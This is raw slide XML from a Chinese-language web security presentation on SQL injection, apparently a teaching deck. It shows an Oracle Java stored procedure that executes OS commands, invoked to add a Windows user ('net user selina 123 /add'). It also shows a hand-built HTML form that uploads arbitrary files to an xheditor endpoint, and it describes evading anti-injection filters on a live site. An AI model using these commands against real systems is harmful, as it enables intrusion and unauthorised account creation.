          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            e.printStackTrace();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建存储过程executeCmd：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace procedure executeCmd(c in varchar2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>language java name 'Execute.executeCmd(java.lang.String)';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行存储过程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exec executeCmd('net user selina 123 /add');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2095500"/>
            <a:ext cx="7369810" cy="1763395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014730" y="592455"/>
            <a:ext cx="6428740" cy="4438015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320290" y="319405"/>
            <a:ext cx="5142865" cy="4504690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072005" y="962025"/>
            <a:ext cx="4999990" cy="3218815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当客户端发送一个Http请求到达服务器端之后，服务器端会接受到客户端提交的请</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>求信息(HttpServletRequest)，然后进行处理并返回处理(HttpServletResopnse)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下图演示了服务器接收到客户端发送的请求头里面包含的信息： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2004695"/>
            <a:ext cx="4980940" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2410460" y="367030"/>
            <a:ext cx="4447540" cy="4409440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190750" y="738505"/>
            <a:ext cx="4761865" cy="3666490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传文件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因为tamper data 没法拦截flash请求，所以通过chrome的拦截记</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>录开始构建上传:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;title&gt;&lt;/title&gt;&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;form enctype="multipart/form-data" action="http://www.x.cn/webschool/xheditor/upload.jsp?moduleId=98&amp;limitExt=all&amp;sid=0" method="post"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;input name="filedata" type="file"&gt;&lt;br&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="上传文件"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="2252345"/>
            <a:ext cx="7047865" cy="63817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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205355" y="2176145"/>
            <a:ext cx="4733290" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148080" y="1114425"/>
            <a:ext cx="6847840" cy="2914015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115060" y="1127125"/>
            <a:ext cx="6914515" cy="3104515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与此同时我把google到的动态连接都打开，比较轻易的就发现了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一处SQL注入漏洞，依旧用POST提交吧，以免他的防注入又把我</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拦截下来了（Jsp里面request.getParameter("parameter")GET</a:t>
            </a:r>
